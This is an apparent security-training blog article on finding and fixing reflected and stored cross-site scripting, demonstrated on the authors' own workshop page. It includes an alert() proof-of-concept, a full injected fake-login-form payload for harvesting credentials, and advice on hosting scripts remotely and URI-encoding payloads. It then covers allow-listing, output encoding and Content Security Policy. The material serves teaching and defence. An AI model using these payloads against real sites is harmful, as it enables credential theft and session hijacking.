Finding and Fixing Cross-site Scripting (XSS)

Published: 19 October 2020


Cross-site Scripting (XSS) is a vulnerability that occurs when an attacker can cause a scripting language to execute within another user’s view of a web application. There are three types: Reflected, Stored, and DOM-Based. Finding and exploiting DOM-Based XSS is quite different from Stored or Reflected, so we’ve separated it into its own article: Finding and Fixing DOM-XSS.

Cross-site Scripting occurs when user input is returned to a user without secure handling, allowing scripts such as JavaScript to execute in that user’s browser. If the payload is contained within the request (such as a GET or POST parameter) and returned within the server response, this is Reflected XSS. If the payload is stored (such as in a database) and returned in a later response, such as when viewing a forum post, this is Stored XSS.
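As a minimal sketch of how such a flaw arises (a hypothetical Python handler, not the actual code of any page discussed here), a reflection vulnerability can be as simple as concatenating user input straight into an HTML response:

```python
# Hypothetical request handler: user input is concatenated directly into
# the HTML response with no encoding, so any tags in `name` are reflected.
def greet(name):
    return "<p>Hello " + name + "</p>"

# A benign value renders as expected...
print(greet("Nathan!"))  # <p>Hello Nathan!</p>

# ...but a script payload is returned verbatim and would execute in the browser.
print(greet("<script>alert()</script>"))
```

Whether this becomes Reflected or Stored XSS depends only on whether `name` arrives in the request itself or is read back from storage such as a database.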

The payloads are generally the same; the difference is simply the method of getting that payload to a target user. For Reflected XSS this is generally achieved by convincing a user to click a crafted link, for example through a phishing email. For Stored XSS an attacker can either send the user a link to the target page, or simply wait for a user to stumble onto the target page through their normal browsing of the vulnerable site.

How to Find and Exploit XSS

The first step to finding XSS is finding an input on the site where user input is returned to the user. In this example we’ll look at Reflected, but the exploitation of Stored would be near identical just without the requirement for a user to click the crafted link.

On our workshop page, which we use for our security training courses, we have a simple reflection point – if you enter your name in the form it says hello and gives back your name:

The user supplied the word “Nathan!” to the form, and the server returns “Hello Nathan!”

In this example, the input is passed through the URL, making this Reflected XSS, as the URL can be crafted and sent to a target user.

This simple text reflection is not, in itself, a security vulnerability (okay, it is possible to place an offensive or political message within the response but the impact is severely limited). The impact becomes more significant if we can smuggle HTML or JavaScript into the response.

For example, we could replace “Nathan!” with a payload such as: <script>alert()</script>

If a user clicks this link they will receive the following:

The JavaScript is reflected to the page, causing the alert box to display

This causes a JavaScript alert box to open within the browser. Whilst an alert box is not a significant payload, it does serve as a safe proof-of-concept for use in penetration test or bug bounty reports, proving that JavaScript execution was possible.

The alert box could easily be replaced with more impactful JavaScript, such as a script to deface the web page content, to steal confidential data from the user’s session, to steal the user’s session token, or to execute an exploit against the user’s browser.

We could, for example, write a script which presents the user with a fake login box to capture user credentials; for example: <style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action=''><p>Your session has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>

This will cause the following output on the vulnerable workshop page:

A fake login box presented as a proof-of-concept; user credentials will be sent to the attacker

Whilst this is an effective payload, there are many other options.

A payload like this would, however, make the crafted link very long. An alternative is to use a src attribute and host the script on a web server the attacker controls, such as:

<script src=""></script>

Using a payload like this, and hosting the script on a server the attacker controls, allows a much shorter crafted link to be used.

Finally, it’s also possible to encode the payload to obfuscate its contents, for example through URI encoding:
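As a sketch of that encoding step, here is the basic proof-of-concept payload URI-encoded with Python’s `urllib.parse.quote` (any URL-encoding tool would do the same):

```python
from urllib.parse import quote

# URI-encode the proof-of-concept payload so the crafted link is less
# obviously a script tag to a casual reader; safe="" encodes every
# reserved character, including "/".
payload = "<script>alert()</script>"
encoded = quote(payload, safe="")
print(encoded)  # %3Cscript%3Ealert%28%29%3C%2Fscript%3E
```

The browser decodes the parameter before the server reflects it, so the encoded link behaves identically to the plain one.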

How to Fix XSS

As stated in the introduction, this issue arises where user-supplied input is included within server responses without filtering or encoding.

Therefore, one very effective method of preventing this attack is to use an allow-list (sometimes called a whitelist), which permits only known-good content. For example, if the expected input is an integer and the user supplies anything other than an integer, you can simply reject that input, and perhaps supply a message informing the user what the issue is, without including the original payload.
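A minimal sketch of that allow-list check, in Python (function and parameter names here are hypothetical):

```python
def parse_quantity(raw):
    """Allow-list validation: accept only ASCII digit strings, reject all else."""
    if raw.isascii() and raw.isdigit():
        return int(raw)
    # Reject without echoing the original input back to the user.
    return None

print(parse_quantity("42"))                        # 42
print(parse_quantity("<script>alert()</script>"))  # None
```

The key points are that the check defines what is allowed rather than what is forbidden, and that the rejection message never reflects the raw input.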

The opposite approach would be a blocklist (sometimes called a blacklist), which attempts to block known-bad content. This requires a complete list of all possible bad inputs and is therefore commonly ineffective, as it opens up the possibility of filter evasion.

However, encoding is often an option: in the example above, if the output was HTML-entity encoded (many languages have a built-in function for this; PHP, for example, has htmlentities()), the browser would not execute the JavaScript.
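In Python, the closest built-in equivalent is `html.escape`; a sketch of the earlier hypothetical handler with the output encoded before it is reflected:

```python
import html

# Encode user input before placing it in the response; the payload is now
# rendered as text instead of being parsed as a tag.
def greet(name):
    return "<p>Hello " + html.escape(name) + "</p>"

print(greet("<script>alert()</script>"))
# <p>Hello &lt;script&gt;alert()&lt;/script&gt;</p>
```

Note that entity encoding is sufficient for this context (text within an HTML element); input reflected into attributes, URLs, or script blocks needs context-appropriate encoding.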

In short, this is because required characters such as less-than and greater-than (< and >) would be replaced with their entity versions, &lt; and &gt;. These entities render correctly in the browser, but the browser will not interpret them as tags, thereby removing the ability to craft HTML tags or execute JavaScript.

It’s also worth considering Content Security Policy (CSP), a browser feature that allows you to specify an allow-list of locations from which JavaScript (and other resources) can be loaded – allowing you to block attacks of this nature across a whole site.
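As an illustrative policy (the values here are just an example, not a recommendation for any particular site), a response header restricting scripts to the site’s own origin would block both inline payloads and attacker-hosted scripts:

```
Content-Security-Policy: default-src 'self'; script-src 'self'
```

Because `'unsafe-inline'` is not listed, inline <script> blocks like the payloads above are refused, and a src-based payload fails because the attacker’s server is not an allowed origin.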
